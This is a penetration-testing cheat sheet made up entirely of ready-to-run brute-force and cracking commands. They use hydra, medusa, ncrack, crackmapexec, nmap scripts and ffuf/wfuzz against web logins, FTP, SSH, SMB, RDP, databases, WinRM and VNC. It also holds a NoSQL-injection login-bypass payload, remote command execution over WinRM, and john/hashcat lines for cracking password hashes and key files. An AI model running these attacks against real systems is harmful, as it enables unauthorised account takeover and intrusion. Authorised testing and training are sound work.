Bruteforce

hydra -L user.txt -P pass.txt -s 80 -f $IP http-get / 

medusa -h $IP -U user.txt -P pass.txt -M  http -m DIR:/webdav/ -T 10

hydra $IP http-post-form "/login.php:username=^USER^&password=^PASS^:invalid" -l <USER> -P <PASS_FILE> -vV -f

ffuf -w <PASS_FILE> -X POST -d "username=admin&password=FUZZ" -H "Content-Type: application/x-www-form-urlencoded" -u http://<IP>/login.php -x http://127.0.0.1:8080 -fs 206

wfuzz -c -z file,<USER_NAMES_FILE> --sc 302 -d 'username=FUZZ&password[$ne]=NO_VALID_PASS&login=login' http://$URL

hydra -C /usr/share/wordlists/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt $IP ftp

hydra -L user.txt -P pass.txt ftp://$IP -I

hydra -l root -P pass.txt ssh://$IP -I -f
hydra -L user.txt -P pass.txt ssh://$IP -I -f

nmap -p 22 --script ssh-brute --script-args userdb=users.lst,passdb=pass.lst \
      --script-args ssh-brute.timeout=4s <target>

crackmapexec smb $IP -u user.txt -p pass.txt

hydra -L user.txt -P pass.txt $IP smb

ncrack -vv --user <USER> -P <PASS_FILE> rdp://$IP

hydra -V -f -L <USER_LIST> -P <PASS_FILE> rdp://$IP

crowbar -b rdp -s $IP -u <USER> -C <PASS_FILE> -n 1

medusa -h $IP -M mysql -u root -P /usr/share/wordlists/rockyou.txt -t 20 -f

hydra -l root -P /usr/share/wordlists/rockyou.txt $IP mysql -t 20 -f

hydra -l postgres -P /usr/share/wordlists/rockyou.txt $IP postgres

hydra -L user.txt -P /usr/share/wordlists/rockyou.txt <IP> postgres

medusa -h $IP -u postgres -P /usr/share/wordlists/rockyou.txt -M postgres

medusa -h <IP> -U /root/Desktop/user.txt -P /usr/share/wordlists/rockyou.txt -M postgres

ncrack -v -U user.txt -P /usr/share/wordlists/rockyou.txt $IP:5432

patator pgsql_login host=<IP> user=FILE0 0=user.txt password=FILE1 1=pass.txt

use auxiliary/scanner/postgres/postgres_login

nmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 $IP

crackmapexec winrm $IP -d $domainName -u user.txt -p pass.txt

crackmapexec winrm <IP> -d <Domain Name> -u <username> -p <password> -x "whoami"

crackmapexec winrm <IP> -d <Domain Name> -u <username> -H <HASH> -X '$PSVersionTable'

nmap -sV --script irc-brute,irc-sasl-brute --script-args userdb=users.txt,passdb=/usr/share/wordlists/rockyou.txt  -p 6697 $IP

keepass2john CEH.kdbx > ceh.hash
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
kpcli --kdb CEH.kdbx

hydra -s 5900 -P /usr/share/wordlists/rockyou.txt -t 4 -V -f vnc://$IP

ncrack -P /usr/share/wordlists/rockyou.txt $IP:5900

medusa -h $IP -u gamma -P /usr/share/wordlists/rockyou.txt -M vnc

unshadow passwd shadow > passwd_shadow.txt

john passwd_shadow.txt

john passwd_shadow.txt --wordlist=/usr/share/wordlists/rockyou.txt

hashcat -m 1800 passwd_shadow.txt /usr/share/wordlists/rockyou.txt -O

ssh2john id_rsa > id_rsa-hash
john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa-hash

hashcat -m 1000 --force 26112010952d963c8dc4217daec986d9 /usr/share/wordlists/rockyou.txtx

export HYDRA_PROXY_HTTP=http://127.0.0.1:8080  

hydra -F -vV -l root -P /usr/share/wordlists/rockyou.txt $IP http-post-form "/phpmyadmin/index.php:pma_username=^USER^&pma_password=^PASS^&server=1&token=a6afebdd3311fac747d68adb1a8bd7ca:denied"

medusa \
  -h $IP \
  -u root \
  -P /usr/share/wordlists/rockyou.txt \
  -M web-form \
  -m FORM:"phpmyadmin/index.php" \
  -m DENY-SIGNAL:"denied" \
  -m FORM-DATA:"post?pma_username=&pma_password=&server=1&&token=i=TQRF[zI*sEkNu@"

hydra -l <USER> -P <PASS_FILE> $IP http-post-form "/webmail/src/redirect.php:username=^USER^&password=^PASS^:F=incorrect" -V -F -u

cewl -w pass.lst http://wordpress.hack -d 1

cat pass.lst | uniq | sort | tr '[:upper:]' '[:lower:]' > pass2.lst